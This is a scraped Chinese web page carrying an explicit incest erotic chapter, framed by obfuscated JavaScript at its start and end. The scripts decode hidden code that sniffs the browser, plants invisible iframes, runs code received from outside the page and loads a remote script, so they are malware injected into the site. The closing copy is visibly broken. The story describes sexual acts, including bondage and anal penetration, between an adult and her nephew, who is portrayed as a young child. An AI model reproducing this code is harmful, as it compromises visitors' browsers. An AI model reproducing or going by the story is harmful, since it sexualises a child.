圣僧中双修_强迫 绑 跪趴

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
第四章:征服小姨(一)

当天我和小姨并没有讲话,而是不发一语的洗澡然后睡觉。我也没有跑到小姨那边去睡,而是回到自己的房间睡觉。我知道小姨需要时间去忘掉今天的一切。

(啊…我居然被高中生还有小风内射了。小风可是我的侄子啊,我居然不知羞耻的跨坐在他的上面,不停地摆动自己的身子,让他的肉棒往我的身体里面挺进。然后就这样任由他的精液射在我的子宫里面。

难道我真的是淫荡的女人,跟自己的侄子做爱居然可以获得那么大的快感。不,这一切都只是为了救小风而已,牺牲我的贞操并没有甚么,只要小风没事就好。

因为小风可是姊姊的女儿,姊夫的血脉还得靠小风继承下去。所以小风不能有事情。我这样做是没关系的。只要是为了小风。)

小姨在房间里浑身赤裸着,躺在床上。脑海全都是今天的事情。

(还好今天是安全期,不然被内射这么多次,我一定会怀孕的。虽然小风的不知道会不会,但是高中生的一定会让我怀孕,如果那样的话,我该怎么面对姊姊。

不过小风的那里好大,那真的是一个小孩该有的尺寸吗?比我丈夫的还要大还要粗,啊,好想要让那根粗大的棒子填满我的那里。用力的在我的体内奔驰着。将那滚烫的精液射到我的体内。将我的那里灌满精液。)

小姨一边想着,左手揉着自己的乳头,右手则是滑到自己的阴道口。手指伸了进去,不停的搅动着。

(啊…快…要…小姨…快要…把你的精液……啊嗯…射进来…小…风。)

小姨一边呻吟着,双手快速的动作着。短短的十分钟,就已经再次高潮。高潮后的她,没有半点力气去清理那些东西,因为她整天被玩弄出无数的高潮,早已经没甚么力气,刚才又自慰了一次。睡意就这样涌上心头。闭上眼睛睡去。

隔天醒来,我看了一下闹钟。发现已经九点多了。可是小姨却没来叫我。我没有穿上衣服,因为现在是夏天热得很,所以就这样穿着一条内裤在家里走动。

我看到小姨的房门没关紧,只见小姨赤裸地躺在床上沉沉的睡着。而表妹则是躺在一旁的幼儿床上睡着。

我走进房间内,站在床边看着熟睡的小姨。看到赤裸的小姨,那晶莹的肌肤暴露在我眼皮下。我吞了一口口水。

我就这样蹑手蹑脚地爬上床。双膝跪在床上。用跪趴的方式。慢慢地横跨过小姨的身躯,就成了我趴在小姨的身上,但是没有碰到她。我将头转向小姨的美腿。

在这里得说一下,小姨的美腿至少一百一十公分左右,而她的身高至少也有一百七十上下。而我只有一百四十的身高,所以我将头靠近在美足那边,我的身体也只到小姨的胸部那里。我的下体就这样悬在小姨的胸部上面,只要勃起的话,就会一口气顶到小姨胸口上的嫣红。

我将上半身缓缓下压,张嘴含住小姨的脚趾。细细地品尝着,舌尖滑过趾间缝隙。上次舔小姨的脚趾是洗澡的时候,那时是充满沐浴乳的香味。

这次则是不同,小姨的美足味道是酸中带甜,甚至还带有一丁点的乳香味。这应该和小姨在产乳中有关系,而那淡淡的甜味,应该是小姨特有的香味吧。

我不再满足于足趾间的缝隙,我开始将身体向后挪动。挪动的同时,舌头慢慢地从脚趾往小腿上面舔去。毫无腿毛的美腿,直接让我的舌头品尝那美好的肌肤。

在我舔弄得过程中,我的下体已经充满血挺立无比。因为我挪动身体的关系,所以这一个挺立,刚好直接顶在小姨的嘴唇上面。而小姨的小嘴微张似乎在呼吸。我一个下沉,肉棒就这样顶入小姨的嘴中。

这时候我顾不得小姨会不会醒来。我双手撑着床单,慢慢做起伏地挺身的动作。每往下挺一次时,我就会舔弄小姨的美腿。小姨的牙齿张开的宽度,刚好足以让我的肉棒通过,但每次通过时却会被磨蹭,那是属于酥麻感的磨蹭,不是疼痛的磨蹭。

这样就像是在跟小姨做爱一样。我的动作越来越快。

(唔!才一张开眼睛,我就看到一个屁股在我的脸上,嘴里被塞入了肉棒,而且还在一上一下的抽动着。本来想要一把推开的,但看到男人的脸是小风后,我突然不想推开了。

因为高中生说过,小风得要每天射出一次,连续一个月才行。那我就当作不知道,让小风射出来好了。

但是这肉棒塞的我的嘴好满,而且怎么这么久还是这么挺,再这样下去甚么时候才会射出来,我来帮小风好了。嗯,这只是为了帮小风射精,不是甚么其他的问题。我这样催眠自己,然后用舌头绕着小风的肉棒,慢慢地打转着。)

唔!突然受到舌头的攻击,我的身体整个颤抖起来,挺立许久的肉棒。将早已蓄势待发的精液,从炮口中向小姨的口腔中射入。

(小风的精液,满满的射入我的嘴里。咕咚咕咚。顺着我的喉咙流入胃袋,我喝下去了,把小风滚烫的精液喝下去了。嗯,接下来就当作不知道的醒来吧,不然小风应该会不知所措吧。)

在射完精液后,我这才惊觉,糟糕。一不小心把精液射到小姨嘴里了,如果这时候她醒来该怎么办。正当我想要想办法解决的时候,下面传来声音。

「小风,你趴在小姨身上干嘛啊,还把你的鸡鸡插在我的嘴里。」小姨这样讲到。

「啊,没有的事。」我连忙从小姨身上下来,但我能看到在我抽出肉棒的瞬间,精液从小姨的嘴角流出来,但是没有很大的量。难道…小姨吞下去了?

心理抱持着这个疑惑,我像是一个做错事的小孩,跪坐在床上低着头。不敢看小姨。

本来我以为小姨会骂我的,然而她的话却是--

「小风,你是不是对女孩子的身体有兴趣?」小姨这样问着。

「恩,我想知道女孩子跟男孩子有甚么不同。」我这样回答。「昨天看到大哥哥对小

姨做那些的事情,我很好奇。」

「那小姨教你认识女孩子的身体好不好?」小姨很严肃地说。「但是你不能跟你妈妈

还有其他人说,就当作我们之间的秘密好吗?」

「嗯嗯。」我狂点头。小姨这样说,代表是要让我看过摸过!如果拒绝的话,那就真

的是傻子。因为这是让小姨彻底沦陷的好机会。

「但是在认识女孩子的身体之前,你老实告诉小姨。你是不是喜欢小姨的脚?」

看来小姨发现了。我时常注意她的美足还有浴室舔她、还有刚才舔的事情。

「恩,我很喜欢小姨的脚。因为很美丽很漂亮。」

「那…认识女孩子的身体之前,小姨先让你认识自己的身体。」小姨妩媚的一笑。起

身下床走到衣柜,从里面拿出几双黑丝袜。再次走回床上。

她把我的手绑到一起,最后将绑起的双手又绑到了床头柜那里,然后把我的双腿打开

,让我整个人成大字型躺在床上。

「小姨你要做甚么?」我疑惑地问道。这个场面似乎在昨天看过,不过被绑的对象是

小姨而不是我。

「小姨教你认识你的身体,才能更好的认识女孩子的身体。」小姨妩媚的笑着。她就

站在床上,拉开丝袜套上玉足,慢慢地穿上丝袜。过程很慢让我看的一清二楚。

咕咚。我咽下口水。看着小姨慢慢地穿上黑四袜。刚刚射精的阴茎,在这一刻又慢慢

的苏醒,在小姨的眼皮下挺立起来。在空气中跳动着。当小姨穿上丝袜时,我的肉棒

已经恢复坚挺,蠢蠢欲动着。

「阿拉,小风已经想要使坏了。」小姨拉过一张床垫,让自己坐在上方。「不过坏孩

子是这个家伙呢。」

她将美足放到我的阴茎上,冰冷的肌肤,还有丝袜的触感。一瞬间让我感到不同的触

感。

小姨将我的肉棒夹在一双美足的脚掌之中。不停地上下挪动着。因为刚刚我才射过一

次,所以在小姨的美足攻势下,我只有一个字「爽」,不停地被丝袜磨蹭着,甚至粉

色的龟头从包皮的保护中露了出来。

小姨的表情相当的淫秽,她看着夹住阴茎的美足,嘴角露出淫荡的笑。甚至有些许的

唾液流出。双足加快了挪动的速度。

「快、坏孩子,快,快把你的精液射出来。射在小姨的脚上也没关系。快,坏孩子,

快把你的精液射出来。小姨要好好的教训坏孩子。」

小姨一边说着淫秽的话,脚上的动作越来越快。

「啊!」一声低吟后,我的阴茎颤抖着。马眼撑开,滚烫的白色精液就这样从马眼中

射出,直接射在小姨穿着黑丝袜的美腿上面。黑色与白色交织成淫秽的场面。

「坏孩子,就这样射了。」小姨微笑着。然后从坐垫上站起来,将射满精液的足掌塞

入我的嘴里。「快,把上面的精液舔掉。这是给坏孩子的惩罚,居然这样就射了。」

唔唔唔!美足塞满我的口腔,我没办法回话。精液的腥味让我无法适应,但在小姨这

种状态下,我只能伸出舌头,将上面的液体给舔净。

让我没想到的是,精液其实刚开始的味道重了点。舔下去的时候并没有其他的味道。

就像是在喝纯粹的蛋白一样。

小姨满意的享受我的服务,将没有被舔的另一只脚,踩到了我的胸口上。用趾尖慢慢

地绕着我的乳头打转,甚至用脚拇指夹着乳晕。

唔唔!乳头上传来的快感,让我全身一阵酥麻。这种感觉太爽快了。

似乎是舔够了,小姨将美足从我的嘴里拿出,塞入另外一只。然后继续刚才的动作,

玩弄我的乳头。

足足舔了十多分钟后,小姨才满意的将美足抽走。

「很好。」小姨重新坐回床垫上,高高在上的看着我。「刚刚小姨做的是足交。你的

小鸡鸡会勃起那是正常现象,而射出来的那东西叫做〔精液〕是男孩才有的东西。」

「现在小姨教你另外的东西。」小姨从床垫走下,把我分开的大腿向上举起。使我的

臀部整个往上翘起,下体还有肛门就这样暴露在小姨眼前。

小姨将食指放入嘴中,沾染一些唾液。然后直接插入我的肛门里。

「啊!好痛,小姨,好痛。」我大叫着。小小的肛门被食指入侵,那一瞬间很痛。大

概就跟处女被破处一样吧。

「呵呵。」小姨只是笑着,并没有说话。但是我能感受到,她的食指更加地深入,就

像是要直接抵达我的直肠一样。

「痛、痛,好痛。」我扭动着身躯,想要让小姨把食指退出来。

啪哒。我的肉棒被人弹了一下。小姨用没有动作的左手,弹我阴茎。

「别乱动,再乱动小姨就要再弹了。」

我没有再乱动,因为刚刚那一下真的很痛。

小姨的食指在我的肛门里搅动着。我的感觉就像是,有甚么东西在胃里翻滚着。两个

字「难受」

在小姨这种玩弄下,我的阴茎再次的挺立起来。

「坏孩子,居然又站起来了。」小姨不满的嘟着嘴。然后又弹了一下我的肉棒。

最后低下头将我的阴茎含入嘴中吞吐着。但食指却没从我的菊花中抽出。而是继续搅

动着。

牙齿、舌头,菊花三重攻势之下,我从勃起到射精,只坚持不到十分钟就缴械投降。

因为充满了刺激。直接将精液射入小姨的嘴中。

明显的看到小姨的喉咙滑动了一下。她将射入嘴里的精液完全吞下。啵,她拔出菊花

里的食指,上面沾着黄色的粪便,她将足上的丝袜脱下,将食指上的秽物擦净。

「小姨刚刚做的那叫做肛交,而帮你用嘴弄出来的叫口交。」小姨看着我,「你记住

了没有?身体的各个部位!」

「我记住了。」我有点如释重负,因为小姨的食指终于拔出了我的体内。不再因为有

异物而感到难受。

「那接下来让你认识女孩子的身体了。」小姨把我手上的丝袜解开。然后双手拉开双

腿,成M字型的躺在床上。

咕咚。我咽下唾液。终于能正大光明玩弄小姨的身体了。

我慢慢地到小姨面前,看着暴露在空气中的嫣红,还有下体的粉色阴唇。

老实说现在我的身体有些不适,因为菊花才刚被小姨的食指插过。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}